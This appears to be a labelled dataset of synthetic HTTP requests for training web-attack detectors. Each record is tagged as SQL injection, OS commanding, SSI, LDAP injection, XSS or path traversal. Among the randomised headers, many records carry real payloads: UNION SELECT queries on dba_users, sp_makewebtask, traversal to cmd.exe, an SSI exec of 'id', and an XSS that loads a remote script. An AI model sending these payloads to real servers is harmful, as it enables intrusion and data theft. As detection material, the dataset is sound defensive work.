GET /damGfaand/qrsetnemljeie1/iT29k41UbOXal0Vsa/ujld/lv8sza/zCiNRbBHth/fyrm9_04jYy6qwgetH_.gif?enbdaandja=8Y524&1J6tmCdeletereplaceY=oozrhDetfwral&cpetyrhs=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&iccdEylrofitro=501675508&hSugca=99&3AIvoWTui=itEim5h8h&o7tdrI4e=ohYe7GHWD&0vsuosntheeaBe=mFVs9w&nellneieau=hz+afZ%3Dhecn&tS9GH3fWF30e=0901 HTTP/1.1
Host: www.eTyoL.org
Connection: keep-alive
Accept: text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 9.211.101.123
Cookie: sCv@-9YjRM-=i6henpeelahNoarac;ih=303
Cookie2: $Version="7"
Date: Tue, 17 Oct 06 17:24:10 UTC
ETag: W/"K_UdcY8UF88HpDJdoTgY"
Expect: 100-continue
From: hnrpa@Dtsdlni.be
If-Modified-Since: Wed, 08 Sep 04 22:27:57 GMT
If-Unmodified-Since: Tue, 24 Jun 08 19:47:23 CET
If-Match: *
If-None-Match: "JMxoNj_owNG5dq-IhQmC"
If-Range: *
Max-Forwards: 057
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: tnEjr B7bt5=zaeTe
Authorization: NTLM b25oZGJ1c3Nib3lnYWE1dGlzb3Jvc3dvdWV1Z3RkYXNzdHRrb3Jv
Range: 83-68
Referer: /Uoiieu/6aba/annpIrs/ns8S/triord.aspx
TE: deflate;q=0.0,trailers,deflate;q=0.4
Trailer: Max-Forwards
User-Agent: Mozilla/7.7 (Windows; U; Win98 4.5; uu-ps; rv:5.8.2) Gecko/71760515
UA-CPU: PowerPC
UA-Disp: 843,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8072x4973
Via: 5.9 248.205.182.57
Transfer-Encoding: YmnYt
Upgrade: mrrUlT/4.8, 7edu/8.3
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 65007245456337542415
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38201
Start - Id: 41201
class: SqlInjection
GET /X7DYRLonph-.O/aRG5MKK3zhR@Onu/1C-OY@QG0divGwHpassthrudelete/5CrCdh4rlsnv7spMoha/sscript/r9vesEOfnTelwa3ant/nW_rbCG56Egz7XWliLS/easDtspaae4iyn8a/dk/mqsnene5dtd.js?es9wi=5846&PttXaahReuyT85=oOly9tE&EdoirneUIadY=3&Nsxnnhepn=8&Efiw0i=eieHSncv0%3Duaen&etena=rb4rKfFlb0c7&Dcuhnt6OnEedn=217188260&BY2OCVTwp=u&sojmiunoason=+t5hgc5&DNW@C1metatmpt4Isam=stdinbhq9Cta&lreoare=es&snNu8htihloih=2682400&ieoaxfazbce=41&e8a6ptimsmsyTm=O HTTP/1.0
Host: 188.237.54.27:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-2022-kr, x-mac-korean, gb2312
Accept-Encoding: chairs'  UNION    SELECT    nirY   FROM   dba_users     WHERE   name  like   '%25
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 28.28.15.165
Cookie: r2o=laEsr;turclnem=e.K@lAUz_
Cookie2: $Version="6"
Date: Wed, 27 Jun 07 08:20:57 UTC
ETag: W/"EEGkhT5mI@eMWl_1"
Expect: ttfr=i4irsb;s65p1tr=etl9i
From: aaoa@eCueedro8q.cz
If-Modified-Since: Thu, 17 Feb 05 18:11:01 UTC
If-Unmodified-Since: Fri, 03 Apr 09 07:47:35 GMT
If-Match: "VLk6Hk1THR8xrseFm9"
If-None-Match: "HpaNwuQLt.8twM35"
If-Range: *
Max-Forwards: 4
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: QnNEm sle7s=ykdes
Authorization: nyss a4KDx=tm3r
Range: 38-,7259-27,6749-28
Referer: http://www.nl2iO1o.biz/xnPc/jeeu9/dsneas/haa6btt.swf
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: caceihhFhu (oqCjRJ; tfMugRaSF; ilNc1xikKp; tTsmonzs; iVS5AEP5)
UA-CPU: MIPS
UA-Disp: 8221,0714,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9560x6945
Via: 3.8 227.50.107.176
Transfer-Encoding: compress
Upgrade: yghpnh/9.7, hoCeOc/6.1
Warning: 671 80.33.40.15 "i4sm64ftefxa" "Thu, 27 Jan 05 16:05:22 CET"
X-Forwarded-For: 25.2.55.98
X-Serial-Number: 9505530425947859
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 41201
Start - Id: 41004
class: SqlInjection
POST /0ECA/i30NI2ASH/eaBf/atvLu5GubtAR1I/Esmma/ucaYXLjiaii/n-ui/eQR3l-eNFv8VWBO/eu@tsN.pl? HTTP/1.0
Content-Length: 294
Content-Language: arectr,hmdtei,sacr
Content-Encoding: gzip
Content-Location: http://ciehAte.st/wsowa/cilm/nhgruun/qt0EE/rehI.cgi
Content-MD5: aGNlbGV0ZWl3c3dhaWRnaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 24 Sep 04 17:54:36 GMT
Last-Modified: Thu, 07 May 09 11:08:51 CET
Host: www.d3sd.cz:80
Connection: close
Accept: image/jpeg, text/xml, application/*
Accept-Charset: iso-8859-15, euc-cn, cp-936;q=0.6, x-mac-chinesesimp, iso-2022-kr;q=0.5
Accept-Encoding: gzip, gzip, identity
Accept-Language: ztdqico-e1zdk, n-swe5eEi, qk-aSd, uh-mota;q=0.4, dd-gsad;q=0.5
Cache-Control: max-age=2172
Client-ip: 40.88.12.243
Cookie: r0uee5Tnhidrt1a=saiArrfrUdceitp
Cookie2: $Version="889"
Date: Sat, 28 May 05 13:55:43 CET
ETag: W/"yB2VYqpUnbgTE.vlG9"
Expect: v0sro3=eghTm;eprtAa2
From: syMege@l8wshrfu.st
If-Modified-Since: Wed, 27 Dec 06 09:20:42 CET
If-Unmodified-Since: Wed, 06 Aug 08 14:32:16 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 11 Nov 06 03:09:49 CET
Max-Forwards: 900
MIME-Version: 8.3
Pragma: no-cache
Authorization: 9etso itrab=ohxvo2N
Referer: /eYe1eyp/xt9lto.gif
TE: gzip
Trailer: Expect
User-Agent: Mozilla/9.0 (Machintosh; U; PPC 3.5; sy-hu; rv:4.6.8) Gecko/10005169
UA-Pixels: 892x2342
Via: qpts/9.8 153.42.31.148:341, 7.4 243.150.13.148, 9.4 54.122.134.60
Transfer-Encoding: gzip
Upgrade: uw1/6.2, gcsmod/3.8, exeh/4.6
Warning: 481 www.urpe.html "staaipsty" "Sat, 08 Jan 05 13:43:34 GMT"
X-Forwarded-For: 250.186.208.209
X-Serial-Number: 0694203566390094
----: ------------

mtbnn=';   EXEC master.dbo.sp_makewebtask   'c:\inetpub\wwwroot\o4b.png',    'SELECT   pk  FROM    mks   WHERE   xtype=''U'''&d46omHao=aoGDUo.tql&etFnEnonutotte=8378&hotefE=jgcpfelc&ayetaA6=ngpcyne&oqOtixegite=3625&qsOuost3xK7nv=r&ecelitn=boot.ini p&tisa=ae9rpkj

End - Id: 41004
Start - Id: 44168
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 186.182.180.189
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: hz-gb-2312
Accept-Encoding: 
Accept-Language: 3ol-de;q=0.4, tdn-t;q=0.4, uas0tyk-trl, enpaeesb-dl;q=0.5, oghseM-sphoe8
Cache-Control: min-fresh=321
Client-ip: 21.12.224.178
Cookie: 0m8wNedbsNgehor=9449386;nMuSYaccept@On=udnn
Cookie2: $Version="13"
Date: Tue, 27 Sep 05 16:05:34 UTC
ETag: W/"aTOdrmXsUZHyRCr-F"
Expect: uZat4lfl=YdgRc;nrwdee
From: ejtot@nhhlptpni.net
If-Modified-Since: Wed, 16 Apr 08 16:49:15 GMT
If-Unmodified-Since: Thu, 26 Jul 07 10:42:32 CET
If-Match: *
If-None-Match: "nNZaNQElM_xY-TcR3F92"
If-Range: *
Max-Forwards: 4163
MIME-Version: 3.5
Pragma: ots='4cruil'
Proxy-Authorization: Digest response="588D5566B01CAeB4251C23B5AbBA4929"
Authorization: Basic ZXhub2xhaDp0clVzOWU3
Range: 13627-239
Referer: /crte.tar
TE: trailers,deflate;q=0.2,chunked;q=0.0
Trailer: If-None-Match
User-Agent: Mozilla/5.7 (X11; U; Linux i586 4.0; 4t-os; rv:8.6.6) Gecko/91623423
UA-CPU: 68000
UA-Disp: 0908,917,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 884x0554
Via: lte6ja/6.7 www.ziok.png
Transfer-Encoding: compress
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 195.218.223.142
X-Serial-Number: 386658457153334430
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44168
Start - Id: 43677
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 11.15.174.14
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: compress, deflate, deflate;q=0.9, compress;q=0.1, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 10.124.19.16
Cookie: Ignj=9Sur;whl6fsnl0R9er=hqo13bsode1i;wa7= mac;nestahnxaa=tt;Deryer3hrms5Tst=:p/:;yWRb_J0Mobject1=935
Cookie2: $Version="617"
Date: Sun, 21 Mar 04 09:15:44 UTC
ETag: W/"S1TaRMTQKjjb-G6@X"
Expect: l9owie
From: r63aj@miwmhwde.ch
If-Modified-Since: Wed, 27 Feb 08 19:17:13 UTC
If-Unmodified-Since: Mon, 14 May 07 06:24:17 GMT
If-Match: "iI0oGN6Soi@SVsRi"
If-None-Match: "x0TiZ1.crdCQ1ywEed3d"
If-Range: Sun, 05 Dec 04 01:14:29 GMT
Max-Forwards: 8
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest username="lieew"
Authorization: Digest algorithm=MD5
Range: 42-91,822939-,-31
Referer: http://Vnp2.fr/oAnavi/sRn0om/khwrlhmm.jsp
TE: trailers,chunked
User-Agent: er6o/7.5.2.9
UA-CPU: PowerPC
UA-Color: color16
UA-Pixels: 827x275
Via: FTP/6.3 131.121.137.220
Transfer-Encoding: identity
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 267 17.232.146.208 "uEwtOaeI" "Fri, 11 Sep 09 24:54:08 CET"
X-Forwarded-For: 163.232.189.112
X-Serial-Number: 84513190969177426
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43677
Start - Id: 39883
class: SSI
GET /W_xml7nCAU230Z4/aNvgcet3ast/eteX.php4?Rwm3Cdmdeano0=387651&ln2ppinaf2ea=v3qeDia6%5Diio%5D%5Cr&nipkrlsnqkai=42561278&aOciasIo60rleo=+usrxovvH6+sa&zte1wjRah=9781&sekSebihn=tjog HTTP/1.0
Host: www.fU2rppen0.be
Connection: 2toenS6R
Accept: */*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 142.227.54.230
Cookie: 2yK-m8usrSwW=idehttpsr;iomfiAe=seAle;ixdss1tnrn6atv=<!   #<!--   #exec     cmd="id"-->;odc=pems2C
Cookie2: $Version="7"
Date: Fri, 25 Jul 08 14:14:53 GMT
ETag: "e_E8OD0quw@4vReJ"
Expect: 100-continue
If-Modified-Since: Mon, 09 Jun 08 10:28:22 GMT
If-Unmodified-Since: Thu, 04 Sep 08 20:06:18 UTC
If-Match: "R9bVx6loH5-_n3d"
If-None-Match: "-Hms8LDC_-O8WFFDZ"
If-Range: Wed, 19 Jan 05 17:50:40 GMT
Max-Forwards: 94
MIME-Version: 6.1
Pragma: iri5shE=gado
Proxy-Authorization: htAfoe Nnews=uqske3p
Authorization: NTLM aXNydGVyaW5VMG10dFRPcmhkZTl0cmhlZXRveGxvZHNkaWx0bA==
Range: 06297-343355,-00060,-2025
Referer: http://e8tqy.cz/nHilcr/eeoi.php
TE: gzip;q=0.5
User-Agent: 9mxiinsrO
UA-OS: Solaris
Via: HTTP/0.9 www.nshBdimq.gif, 2.6 www.luebS5rm.tiff
Transfer-Encoding: sewnz; iiruw9n=ilhoth
----: ------------------------------------------------

null

End - Id: 39883
Start - Id: 38341
class: LdapInjection
GET /863w5MVteE-7i/7IwUK24Fq/im/boot.iniRuYX7cS67owhttpsxterm/iiERoaO2ko/siSljF.htm?wNeSogroup byC.Z=875&hahoutrogb7de=j%26-nbwhr6e&iqnpeehaH=78164&z_pH7acceptformYuuQl=scriptea%3D8trw%27aoiGta&twl0fctt=0diuetin&oeefre=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&1winlW4ofycow=nb8Hnmr2O&red5tuk37=tCYdHWhO HTTP/1.1
Host: www.lyrghtnos.it
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-8859-2, x-mac-hebrew, isiri-3342;q=0.3, iso-8859-6;q=0.1
Accept-Encoding: identity;q=0.3, gzip;q=0.8, compress;q=0.2
Accept-Language: oth-rpNo, r-ttmerr
Cache-Control: Jt9=a
Client-ip: 103.183.132.251
Cookie: hnSsebam=931322;rssonem8hreTwde= rau?r2hsst nr
Cookie2: $Version="10"
Date: Sat, 09 Dec 06 14:48:40 UTC
ETag: "WbPrN@xJVi3tQ@DS"
Expect: krvt=nsetrd;ejpTaih
From: ha6o@adqussrlf.gov
If-Modified-Since: Sat, 16 Jun 07 13:12:33 UTC
If-Unmodified-Since: Wed, 13 May 09 01:08:00 UTC
If-Match: *
If-None-Match: "PMHHu.9VKtT0TGC"
If-Range: Sat, 16 Dec 06 23:09:24 CET
Max-Forwards: 117
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: thnpao e7eGhet=ha4hIt
Authorization: NTLM aDhsZW5ld0l1ZW85aWNkaE8ydG5CaGlub2tEb2x6aW81ZHJaZUtjb2Fl
Range: -983,67-,-090
Referer: /ihtnohw.jpg
TE: trailers,chunked,chunked;q=0.5
Trailer: Pragma
User-Agent: irrmkwdv0qG4ingpera9
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 6454x625
Via: uiwtsY/9.5 www.hnetr.jpeg, itow/7.8 www.iaxw.js
Transfer-Encoding: gzip
Upgrade: o7w/9.0, ohy/4.6
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 0735348068
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38341
Start - Id: 44838
class: PathTransversal
GET /nWVbnk.-7u-jjJz/nkv6qzG-UY1L/toHrpoiotne/p_/myWG-yw7fzzfjULbDb.m/eet8/wihoYibmhtt1ogygsl/eyvaTeia/kwaEhmS6JmPg3/3enodeSqcmd0.group byemKuj0/g1vBFLF2fQHOKOnvlA2z/izclwyhEeuMe.dll?brrAntco=aae+&asc=doc%28+++file%3A%2F%2F%2Fc%3A%2Ftiahe%2F3opgSinr.xml++%29 HTTP/1.1
Host: www.srjutCsrpm.fr
Connection: esiO
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.0, compress;q=0.3, deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 238.82.144.7
Cookie: id=0t?aSy2akv3m;Efhnnc3hhe=59921497;Grtgtarj=nyoolocation;es=okG;aEszb=l:httve
Cookie2: $Version="393"
Date: Mon, 14 Jun 04 18:55:16 CET
ETag: W/"1jGtoTUskEbXDpBL"
Expect: 100-continue
From: eosehi@IsoiaSe.uk
If-Modified-Since: Sun, 28 Nov 04 03:59:32 UTC
If-Unmodified-Since: Sat, 25 Nov 06 19:15:51 UTC
If-Match: "_F5cy_Ape-PYI7E2EApc"
If-None-Match: "wR_cMKeEkXkLCXj@0bjj"
If-Range: Sun, 17 Apr 05 14:17:59 CET
Max-Forwards: 1
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM cnRhZ25sYWlscmNrMzQweWRwdG9jYW9zZWx0cGVubXZp
Authorization: Basic aGVlcjdyOm9rd3Nz
Range: 4-,8-56742
Referer: http://www.eotsqd.biz/fNAriei/nos5/dse81i/iiEe.rar
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/9.2 (Machintosh; U; Mac OS X 7.2; yb-o7; rv:7.7.4) Gecko/33758908
UA-CPU: MIPS
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 035x248
Via: FTP/4.0 88.216.108.71:8, FTP/1.7 www.tnnzoa.css
Transfer-Encoding: identity
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 479 www.eao96f.png "ldeigihLwAo78oeint" "Mon, 21 Dec 09 20:16:29 UTC"
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 13064
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44838
Start - Id: 36906
class: LdapInjection
PUT /ltAmkDQhGttN/dkm/ltndm/8lozgTnynuitgjlw/44/tPDA/rPgMjhTtfkSSXCGB/nF3-/Scsdrlcaamkr/ty.6aaHX@GjS.htm? HTTP/1.0
Content-Length: 246
Content-Language: 3tw,Cnhncn
Content-Encoding: identity
Content-Location: http://www.srlju2eD.cz/oehardcm/roi3caj/nraeedpm/0R3eswo.exe
Content-MD5: Z3JzZWVyZmVlc2FUeW54Nw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 May 08 05:29:26 CET
Last-Modified: Sat, 18 Nov 06 12:09:08 UTC
Host: www.Taumiots.uk
Connection: eaaed
Accept: */*;q=0.0
Accept-Charset: windows-1252;q=0.2, utf-7, iso-2022-kr
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 16.173.236.24
Cookie: S2kR=snlS;n6toonuheA=q6qdVrbp;giaafaseoa=xscriptSr;elWIasoritc0f=whREnnD0dwseeepassthruh+k;etlyt=549297010
Cookie2: $Version="982"
Date: Sat, 29 Sep 07 23:45:27 GMT
ETag: "xPaZn8bGGwCMl.Xl"
Expect: 5nir
From: Do6baraA@811ntp.st
If-Modified-Since: Tue, 13 May 08 09:27:42 UTC
If-Unmodified-Since: Sun, 12 Nov 06 19:17:44 UTC
If-Match: *
If-None-Match: "gd9NmGca5Axg6cPZ"
If-Range: *
Max-Forwards: 31
MIME-Version: 7.4
Pragma: asM=tooe
Proxy-Authorization: NTLM cmVlZXRyZWdpYWJlb3N0ZUFPdGd6bm85Ym5jbndpdG5jc2Vxc2J1YVNlcg==
Authorization: NTLM YWJsdHhiaG1laXFpZG1sZG9ueW9zcWVjaDFiYXRjSHR0RGU=
Range: 03-
Referer: http://sha7eoz.de/eSeljeS.wav
TE: trailers
Trailer: Warning
User-Agent: fiytlki/7.3.0.9
UA-OS: Win98
Via: 1.9 39.111.132.232
Transfer-Encoding: identity
Upgrade: tn40Sc/6.9, 8ysiw/2.7, ehl4of/1.6
Warning: 128 59.175.65.205 "atelalsoarn" 
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ayami3tramn=Ut6ti)(&(objectClass   =  fae*)&yoo=d= &9s=spftkzu&ee4lscnr8ohh=eaa%itas mnformeautoexecv&hsFimoqeaep=iuZWJnMJO.m&sn6tvC.=qhSeaar&evoemn93dqniob=kaofblhustqrve&tOheK8l6khml=hex&herbUdoetslrn=9931&fafenej=wCh6lRoooam15t

End - Id: 36906
Start - Id: 47872
class: XSS
GET /RMtiacrsErt5hseea4rd/8ph1bHMuincludeTTAz/l-u8kkXoDzmbDRa./kehn/G-AAeVmppassthruf/tt/hns7mosp09Ioher3T/lPklct0aha/SnE3Z6sW_h9Stservices/qpatretoz8chislaln.mspx?ori9rnswiorrr=rza&nsso=316&H@8HF=ztw&copyPq3OM56NL=%3Cdiv++style+%3D++++%22+++++binding%3A+url%28%5Bhttp%3A%2F%2Fwww.re.com%2Fscript%2Foii0Snakvu.pl%5D%29%3B++++%22+%3E&afri=hrao%25stotnddj9tEttnz&aeNs83=oU%29 HTTP/1.1
Host: www.paagn3o7Do.cz
Connection: c3pav
Accept: */*;q=0.2
Accept-Charset: x-mac-ce;q=0.2, hz-gb-2312, iso-8859-3, gb2312
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 110.70.167.237
Cookie: cNhoaiiet1ko=rn
Cookie2: $Version="528"
Date: Mon, 07 Aug 06 07:52:42 CET
ETag: "X1yDs.l_MY_IahX"
Expect: hhr4=sfe1
From: wu4c60i@McindieetT.fr
If-Modified-Since: Tue, 16 Oct 07 11:01:47 UTC
If-Unmodified-Since: Thu, 04 May 06 08:06:36 GMT
If-Match: "a6CQoXpvd3QZYQ5ZU97w"
If-None-Match: "uWgmd0ocJMciF1VU"
If-Range: "gI9m98@iivJ-4YmZAa8"
Max-Forwards: 03
MIME-Version: 0.1
Pragma: ltsOa4ai=3hplmear
Proxy-Authorization: 94wiw ilu2a=emsx
Authorization: Basic ZW9hZU5zcDpzYmFpZXc=
Range: 064-,-6198,422476-
Referer: http://jOS0etfe.biz/llnv1noa/gEdoqsa6/rncxhae.php3
TE: gzip
Trailer: Accept
User-Agent: Mozilla/4.6 (Windows; U; WinNT 0.2; 6w-et; rv:2.8.2) Gecko/94757270
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: FreeBSD
UA-Pixels: 3411x5439
Via: HTTP/0.0 205.6.171.172:99, 0.5 231.218.181.24:74
Transfer-Encoding: identity
Upgrade: DilEe/7.0, ibtxn/3.8, a7else/8.2
Warning: 184 www.lWrp.gif "zt1pol" 
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 110017564718
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47872
Start - Id: 35251
class: SqlInjection
GET /Oloie/sqdeYidl4/zQ6scTm/arP1frHg1tdcU/seOvrfbh/oV0./c9mMyBZy0minlmx/sO9J.tRf7TWhEdlX/lzGG/ipy2cof8An1eoue/0eniNrgraoQcHr/aWT.shtml?heuateebr=jw&tstedNspkti=d&pPDrlvhi=9Ql&rLNLhomeP@ooW=8e%24&rhs0ewWs=chairs%27++++UNION+++SELECT+E+FROM++dba_users+++WHERE++name+++like+++%27%2525&fr=A9%3Aceti%28z&rtwAdivaaasp4=%3Enr+dselectUe-mpKytl&ha=+oi&rezQw2seisi=8286 HTTP/1.1
Host: www.aeiti.fr
Connection: wautUsd1
Accept: application/x-tar;q=0.8, text/*;q=0.2, audio/x-wav
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: cyisn=Clzij
Client-ip: 149.160.7.148
Cookie: mE=gGBo;yami3h6ed1hH=rad;tgdee=b1GGs;xZQD= :anO-8z
Cookie2: $Version="04"
Date: Thu, 06 Oct 05 18:12:53 UTC
ETag: W/"DwexuFP2Uv@IX0e"
Expect: ot0agzmn
From: ieogO97c@1xtO.uk
If-Modified-Since: Thu, 02 Apr 09 04:44:39 GMT
If-Unmodified-Since: Fri, 24 Nov 06 13:27:51 CET
If-Match: "BR4X2qulDEphY.q"
If-None-Match: "@EliaMfR4Js8iSZ"
If-Range: "jW@Rm9CmGNHcSfF"
Max-Forwards: 27
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: 8eEcs dejCatel=tunerro
Authorization: Digest qop=auth-int
Range: 686-87074
Referer: http://emnhlnU.be/areqe/dd4tc.jpg
TE: trailers,trailers,deflate;q=0.7
Trailer: User-Agent
User-Agent: Mozilla/2.4 (compatible; Konqueror/2.3; Win 9x; qtetAlY; dnata4)
UA-CPU: 68000
UA-Disp: 052,8339,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7374x0863
Via: 2.8 165.220.150.159, 4.4 www.nnkm1.jpeg
Transfer-Encoding: rargre
Upgrade: vet/2.3
Warning: 155 www.moac.shtml "35ronmeh9nhdee" 
X-Forwarded-For: 242.188.252.188
X-Serial-Number: 99658845770
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35251
Start - Id: 35385
class: SqlInjection
GET /nsAbsrm/hmiesylaae/qgrt/52og/enehdngRi/sooIwY1ef/gern/nWq@rQY/TyM.gif?ouyehW8itors=%3B++exec++get_cust%28%27x%27%27+++union+select+++++object_name%2Cobject_type%2C%27%27x%27%27+from+++++user_objects+where++++%27%27oru%27%27%3D++%27%27++%27++++%29%3B&1irttdsnm=050896&8utteee1in7=d_PNuxlgwDXK&PG4BVh=rpztor%25rpst+eiea&teaeeadmad8cd=logE&eaaa6wsbs=77&elrhrel=m+u&wln=edi&8okxtermqB06=902 HTTP/1.0
Host: www.hedAlE2S.ch
Connection: asibwdm
Accept: text/*;q=0.6, text/html;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 136.187.28.79
Cookie: ati5steu=xtermmnir;ploEs=08516422;eo=71
Cookie2: $Version="548"
Date: Thu, 08 Mar 07 04:15:04 CET
ETag: W/"1zpGD6YngN8ikJCz7Uio"
Expect: aean4o8=I7mo
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Fri, 14 Apr 06 16:24:13 CET
If-Unmodified-Since: Wed, 23 Jul 08 13:23:46 GMT
If-Match: *
If-None-Match: "nZsX-_rwsF3vYgLqqpXS"
If-Range: Wed, 07 May 08 02:38:29 GMT
Max-Forwards: 4
MIME-Version: 9.2
Pragma: Qbd3hDeU=acrtaxe
Proxy-Authorization: wsul areisdr=nehaa
Authorization: nlrxfp hrabn=rnokncdx
Range: 55-,0-,6611-
Referer: /hiNtntq/noaiLrz/htax/srosoe.aspx
TE: trailers
Trailer: Transfer-Encoding
User-Agent: heCevl
UA-CPU: Sparc
UA-OS: Windows 95
UA-Pixels: 177x860
Via: 7.5 24.251.102.100, lgps/2.5 240.117.135.68
Transfer-Encoding: identity
Warning: 012 87.127.171.211 "neieAoyzeceydgth" 
X-Forwarded-For: 31.250.119.48
X-Serial-Number: 6475982437005855
----: ----------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 35385
Start - Id: 39238
class: SSI
GET /i12nJJ5C/2yt8K1ekpzr1/kB5ku/iNg2.VLIOeL8.html?odsaQ6wfi=%3Benlogeevalbvstyler2t&nPxielet=p.ij&Iaohc=3&xtAydncotsorwth=cUWlcUmCnzWK&srqaIlmngho=gidh&aret=dwhi&dnda=%3C%21--%23email+fromhost%3D%22www.eneuzlef.com%22+tohost%3D%22mailbox.hban8.com%22+message%3D%22siineh+ren8pe+ianyret+otkir%22+fromaddress%3D%228oehte.com%22+toaddress%3D%22eta.esryo8.com%22+subject%3D%22o9H%22+sender%3D%22aMxf.com%22+replyto%3D%22bpmdyee.com%22+cc%3D%22duo%22+inreplyto%3D%227ihhe+CeNm+daht%22+id%3D%22tsbmail%22+--%3E HTTP/1.0
Host: 66.62.203.252:8931
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.8
Accept-Language: emoHx-heim2r, toc4ntr-t5cochv, 4li-nshnaR, odiati1h-v0dsrr, asl-mtLiyi
Cache-Control: ynx='utvsuitz'
Client-ip: 138.41.1.241
Cookie: aspaqs7lOloevmo=qre7estat;aiJ11=3Q_O@fZ
Cookie2: $Version="350"
Date: Fri, 05 Oct 07 17:33:23 CET
ETag: "cS1W5p5mqGlKWO@j3hH8"
Expect: nt2ywf=tydio8l;a2tap7a9=yuui4
From: saxeqIt@wdataw7.be
If-Modified-Since: Sun, 06 Sep 09 23:29:26 CET
If-Unmodified-Since: Mon, 12 Jun 06 09:09:42 CET
If-Match: "Ax_Hwmw7aTiwjzh"
If-None-Match: *
If-Range: "QEelm2mgLh-UbRfP0"
Max-Forwards: 2
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic c2ltMjpzYWdlYjVhYQ==
Authorization: Digest realm
Range: 5-9725,-6683
Referer: http://hgtsVQ.ch/sprieh/oaivh.php3
TE: gzip
Trailer: Date
User-Agent: Mozilla/4.1 (compatible; MSIE 6.6; Win98; 7noeorrrea; naromos3t7)
UA-CPU: 68000
UA-Disp: 274,6270,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 833x510
Via: A2e/2.1 190.100.23.126
Transfer-Encoding: deflate
Upgrade: sjrtoN/2.4, ytwq/5.4, RmLke/9.3, citRri/1.2
Warning: 181 99.114.125.39:5648 "7neetnanYrOl" "Tue, 11 Jul 06 10:45:12 GMT"
X-Forwarded-For: 252.9.253.184
X-Serial-Number: 70848217274143
----: ----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 39238
Start - Id: 44227
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 3.81.51.71
Connection: TO0hfed
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 157.29.164.15
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="93"
